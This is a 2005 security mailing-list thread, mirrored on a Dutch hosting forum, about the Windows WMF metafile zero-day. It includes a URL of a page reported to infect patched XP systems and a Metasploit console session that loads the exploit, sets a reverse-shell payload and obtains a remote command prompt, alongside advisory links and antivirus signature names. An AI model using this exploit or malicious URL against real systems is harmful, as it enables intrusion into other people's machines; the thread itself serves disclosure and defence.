Likes Likes:  0
Resultaten 1 tot 5 van de 5
Geen
  1. #1
    noemailpls@noemail.ziper
    Is this a new exploit?
    Gast
    n/a Berichten
    Berichten zijn liked



    Thread Starter

    Is this a new exploit?

    Warning the following URL successfully exploited a fully patched windows xp system with a freshly updated norton anti virus.

    unionseek.com/d/t1/wmf_exp.htm

    The url runs a .wmf and executes the virus, f-secure will pick up the virus norton will not.

  2. #2
    H D Moore
    Is this a new exploit?
    Gast
    n/a Berichten
    Berichten zijn liked



    Thread Starter

    Re: Is this a new exploit?

    I ported the exploit to the Metasploit Framework in case anyone wants to
    test it without installing a thousand spyware apps...

    Available from 'msfupdate' for MSF users, or in the 2.5 snapsh

    --http://metasploit.com/projects/Framework/exploits.html#ie_xp_pfv_metafile
    --http://metasploit.com/tools/framework-2.5-snapshot.tar.gz

    Tested on Win XP SP1 and SP2.

    -HD

    + -- --=[ msfconsole v2.5 [147 exploits - 77 payloads]

    msf > use ie_xp_pfv_metafile
    msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse
    PAYLOAD -> win32_reverse
    msf ie_xp_pfv_metafile(win32_reverse) > set LHOST 192.168.0.2
    LHOST -> 192.168.0.2
    msf ie_xp_pfv_metafile(win32_reverse) > exploit
    [*] Starting Reverse Handler.[*] Waiting for connections to http://0.0.0.0:8080/anything.wmf[*] HTTP Client connected from 192.168.0.219:1060 using Windows XP[*] Got connection from 192.168.0.2:4321 <-> 192.168.0.219:1061

    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.

    C:\Documents and Settings\XXXX\Desktop>


    On Tuesday 27 December 2005 14:20, noemailpls@noemail.ziper wrote:
    > Warning the following URL successfully exploited a fully patched
    > windows xp system with a freshly updated norton anti virus.
    >
    > unionseek.com/d/t1/wmf_exp.htm
    >
    > The url runs a .wmf and executes the virus, f-secure will pick up the
    > virus norton will not.


  3. #3
    redxii1234@hotmail.com
    Is this a new exploit?
    Gast
    n/a Berichten
    Berichten zijn liked



    Thread Starter

    Re: Is this a new exploit?

    apparently WMF can still execute code;

    http://redxii.blogspot.com/2005/12/v...rendering.html

    there was a patch for it two Tuesdays ago. It can still execute code even with the aforementioned patch

  4. #4
    Andreas Marx
    Is this a new exploit?
    Gast
    n/a Berichten
    Berichten zijn liked



    Thread Starter

    Re: Is this a new exploit?

    Hi,

    yes, it seems to be a new exploit. More details about the problem can be found here:

    http://www.f-secure.com/weblog/archi....html#00000752
    http://isc.sans.org/diary.php?storyid=972
    http://www.heise.de/newsticker/meldung/67794

    Some AV companies have created signatures for the latest critter already:

    AntiVir TR/Dldr.WMF.Small
    Dr Web Exploit.MS05-053
    F-Secure Exploit.Win32.Agent.r
    Fortinet W32/WMF-exploit
    Kaspersky Exploit.Win32.Agent.r
    McAfee (BETA) Exploit-WMF trojan
    Symantec (BETA) Download.Trojan

    cheers,
    Andreas Marx
    http://www.av-test.org


    Warning the following URL successfully exploited a fully patched windows xp system with a freshly updated norton anti virus.

    unio[removeme]nseek.com/d[removeme]/t1/wm[removeme]f_exp.htm

    The url runs a .wmf and executes the virus, f-secure will pick up the virus norton will not.

    __________________________________________________ ____________________
    XXL-Speicher, PC-Virenschutz, Spartarife & mehr: Nur im WEB.DE Club!
    Jetzt gratis testen! http://freemail.web.de/home/landingpad/?mc=021130


  5. #5
    Portz, Jon
    Is this a new exploit?
    Gast
    n/a Berichten
    Berichten zijn liked



    Thread Starter

    RE: Is this a new exploit?

    This is a multi-part message in MIME format.

    ------=_NextPart_000_002D_01C60B8B.2AFD7090
    Content-Type: text/plain;
    charset="us-ascii"
    Content-Transfer-Encoding: 7bit


    Windows .wmf vulnerability, look here:

    http://secunia.com/advisories/18255/

    JTP

    -----Original Message-----
    From: noemailpls@noemail.ziper [mailto:noemailpls@noemail.ziper]
    Sent: Tuesday, December 27, 2005 3:20 PM
    To: bugtraq@securityfocus.com
    Subject: Is this a new exploit?

    Warning the following URL successfully exploited a fully patched windows xp
    system with a freshly updated norton anti virus.

    unionseek.com/d/t1/wmf_exp.htm

    The url runs a .wmf and executes the virus, f-secure will pick up the virus
    norton will not.

    ------=_NextPart_000_002D_01C60B8B.2AFD7090
    Content-Type: application/x-pkcs7-signature;
    name="smime.p7s"
    Content-Transfer-Encoding: base64
    Content-Disposition: attachment;
    filename="smime.p7s"

    MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCS qGSIb3DQEHAQAAoIIIwzCCAksw
    ggG0oAMCAQICAw/3bjANBgkqhkiG9w0BAQQFADBiMQswCQYDVQQGEwJaQTElMCMGA 1UEChMcVGhh
    d3RlIENvbnN1bHRpbmcgKFB0eSkgTHRkLjEsMCoGA1UEAxMjVG hhd3RlIFBlcnNvbmFsIEZyZWVt
    YWlsIElzc3VpbmcgQ0EwHhcNMDUxMjAxMjE1MTUwWhcNMDYxMj AxMjE1MTUwWjBDMR8wHQYDVQQD
    ExZUaGF3dGUgRnJlZW1haWwgTWVtYmVyMSAwHgYJKoZIhvcNAQ kBFhFqcG9ydHpAa2ZvcmNlLmNv
    bTCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAzDowpduEMh XDay75CBzON7E+4f5q3xSFXban
    mzxAFcd9nWy0DSJYBRsQpu6BmCTW+W2mKmEkec6nGXbyLbAV4D XN02ySlqm2JGsc7qvhOqcvy+Le
    QVvL5F0c1E9DfzkvHa+0jkmORIJfo5fOQCtuA3No4Ed0HSiBEV/jKee/Ud0CAwEAAaMuMCwwHAYD
    VR0RBBUwE4ERanBvcnR6QGtmb3JjZS5jb20wDAYDVR0TAQH/BAIwADANBgkqhkiG9w0BAQQFAAOB
    gQB0ahvE5RQXQow8dJ/ff5OFzZoMqw1pWVclg6sGrfWAhrC10I86K7kA9iXiHc1ochJDq 5PauBqx
    lvtl+0kta1TbAaNp5vKu1dtfgqYCvxX2q1H1tXKf8groNNjzBO/Hpsc49l5z7DvwQECygv+BOdqI
    V3ECv2dAqUAr7fN2WeKx8TCCAy0wggKWoAMCAQICAQAwDQYJKo ZIhvcNAQEEBQAwgdExCzAJBgNV
    BAYTAlpBMRUwEwYDVQQIEwxXZXN0ZXJuIENhcGUxEjAQBgNVBA cTCUNhcGUgVG93bjEaMBgGA1UE
    ChMRVGhhd3RlIENvbnN1bHRpbmcxKDAmBgNVBAsTH0NlcnRpZm ljYXRpb24gU2VydmljZXMgRGl2
    aXNpb24xJDAiBgNVBAMTG1RoYXd0ZSBQZXJzb25hbCBGcmVlbW FpbCBDQTErMCkGCSqGSIb3DQEJ
    ARYccGVyc29uYWwtZnJlZW1haWxAdGhhd3RlLmNvbTAeFw05Nj AxMDEwMDAwMDBaFw0yMDEyMzEy
    MzU5NTlaMIHRMQswCQYDVQQGEwJaQTEVMBMGA1UECBMMV2VzdG VybiBDYXBlMRIwEAYDVQQHEwlD
    YXBlIFRvd24xGjAYBgNVBAoTEVRoYXd0ZSBDb25zdWx0aW5nMS gwJgYDVQQLEx9DZXJ0aWZpY2F0
    aW9uIFNlcnZpY2VzIERpdmlzaW9uMSQwIgYDVQQDExtUaGF3dG UgUGVyc29uYWwgRnJlZW1haWwg
    Q0ExKzApBgkqhkiG9w0BCQEWHHBlcnNvbmFsLWZyZWVtYWlsQH RoYXd0ZS5jb20wgZ8wDQYJKoZI
    hvcNAQEBBQADgY0AMIGJAoGBANRp19SwlGRbcelH2AxRtupykb CEXn0tDY97Et+FJXUodDpCLGMn
    n5V7S+9+GYcdhuqj3bnOlmQawhRuRKx85o/oTQ9xH0A4pgCjh3j2+ZSGXq3qwF5269kUo11uenwM
    pUtVfwYZKX+emibVars4JAhqmMex2qOYkf152+VaxBy5AgMBAA GjEzARMA8GA1UdEwEB/wQFMAMB
    Af8wDQYJKoZIhvcNAQEEBQADgYEAx+ySfk749ZalZ2IqpPBNEW DQb41gWGGsJrtSNVwIzzD7qEqW
    ih9iQiOMFw/0umScF6xHKd+dmF7SbGBxXKKs3Hnj524ARx+1DSjoAp3kmv0T9 KbZfLH43F8jJgmR
    gHPQFBveQ6mDJfLmnC8Vyv6mq4oHdYsM3VGEa+T40c53ooEwgg M/MIICqKADAgECAgENMA0GCSqG
    SIb3DQEBBQUAMIHRMQswCQYDVQQGEwJaQTEVMBMGA1UECBMMV2 VzdGVybiBDYXBlMRIwEAYDVQQH
    EwlDYXBlIFRvd24xGjAYBgNVBAoTEVRoYXd0ZSBDb25zdWx0aW 5nMSgwJgYDVQQLEx9DZXJ0aWZp
    Y2F0aW9uIFNlcnZpY2VzIERpdmlzaW9uMSQwIgYDVQQDExtUaG F3dGUgUGVyc29uYWwgRnJlZW1h
    aWwgQ0ExKzApBgkqhkiG9w0BCQEWHHBlcnNvbmFsLWZyZWVtYW lsQHRoYXd0ZS5jb20wHhcNMDMw
    NzE3MDAwMDAwWhcNMTMwNzE2MjM1OTU5WjBiMQswCQYDVQQGEw JaQTElMCMGA1UEChMcVGhhd3Rl
    IENvbnN1bHRpbmcgKFB0eSkgTHRkLjEsMCoGA1UEAxMjVGhhd3 RlIFBlcnNvbmFsIEZyZWVtYWls
    IElzc3VpbmcgQ0EwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAo GBAMSmPFVzVftOucqZWh5owHUE
    cJ3f6f+jHuy9zfVb8hp2vX8MOmHyv1HOAdTlUAow1wJjWiyJFX CO3cnwK4Vaqj9xVsuvPAsH5/Ef
    kTYkKhPPK9Xzgnc9A74r/rsYPge/QIACZNenprufZdHFKlSFD0gEf6e20TxhBEAeZBlyYLf7AgMB
    AAGjgZQwgZEwEgYDVR0TAQH/BAgwBgEB/wIBADBDBgNVHR8EPDA6MDigNqA0hjJodHRwOi8vY3Js
    LnRoYXd0ZS5jb20vVGhhd3RlUGVyc29uYWxGcmVlbWFpbENBLm NybDALBgNVHQ8EBAMCAQYwKQYD
    VR0RBCIwIKQeMBwxGjAYBgNVBAMTEVByaXZhdGVMYWJlbDItMT M4MA0GCSqGSIb3DQEBBQUAA4GB
    AEiM0VCD6gsuzA2jZqxnD3+vrL7CF6FDlpSdf0whuPg2H6otnz YvwPQcUCCTcDz9reFhYsPZOhl+
    hLGZG***GguCdJ4lUJRix9sncVcljd2pnDmOjCBPZV+V2vf3h9 bGCE6u9uo05RAaWzVNd+NWIXiC
    3CEZNd4ksdMdRv9dX2VPMYICzzCCAssCAQEwaTBiMQswCQYDVQ QGEwJaQTElMCMGA1UEChMcVGhh
    d3RlIENvbnN1bHRpbmcgKFB0eSkgTHRkLjEsMCoGA1UEAxMjVG hhd3RlIFBlcnNvbmFsIEZyZWVt
    YWlsIElzc3VpbmcgQ0ECAw/3bjAJBgUrDgMCGgUAoIIBvDAYBgkqhkiG9w0BCQMxCwYJKoZIh vcN
    AQcBMBwGCSqGSIb3DQEJBTEPFw0wNTEyMjgxMzQ2MTdaMCMGCS qGSIb3DQEJBDEWBBTlifT58PwF
    CuLfUov/LoMO1ZbuxjBnBgkqhkiG9w0BCQ8xWjBYMAoGCCqGSIb3DQMHMA 4GCCqGSIb3DQMCAgIA
    gDANBggqhkiG9w0DAgIBQDAHBgUrDgMCBzANBggqhkiG9w0DAg IBKDAHBgUrDgMCGjAKBggqhkiG
    9w0CBTB4BgkrBgEEAYI3EAQxazBpMGIxCzAJBgNVBAYTAlpBMS UwIwYDVQQKExxUaGF3dGUgQ29u
    c3VsdGluZyAoUHR5KSBMdGQuMSwwKgYDVQQDEyNUaGF3dGUgUG Vyc29uYWwgRnJlZW1haWwgSXNz
    dWluZyBDQQIDD/duMHoGCyqGSIb3DQEJEAILMWugaTBiMQswCQYDVQQGEwJaQTEl MCMGA1UEChMc
    VGhhd3RlIENvbnN1bHRpbmcgKFB0eSkgTHRkLjEsMCoGA1UEAx MjVGhhd3RlIFBlcnNvbmFsIEZy
    ZWVtYWlsIElzc3VpbmcgQ0ECAw/3bjANBgkqhkiG9w0BAQEFAASBgKxeIAiUtNgzZODxIpkPSOYt
    zU+zSDJQT+XQ2ISlHIyHhS1JEs39XEhaOUIKgGHPCIJmMM7pNW p/Tv8ar9RsUKKbi30L+3ADscS5
    9NLKCQC735BjMzYOUhanaVMXkRcH7ozMTDNYjLZ7obVSI85kmw 4SJOJ/FBB8AognvNEXbnVcAAAA
    AAAA

    ------=_NextPart_000_002D_01C60B8B.2AFD7090--

Webhostingtalk.nl

Contact

  • Rokin 113-115
  • 1012 KP, Amsterdam
  • Nederland
  • Contact
© Copyright 2001-2026 Webhostingtalk.nl.
Web Statistics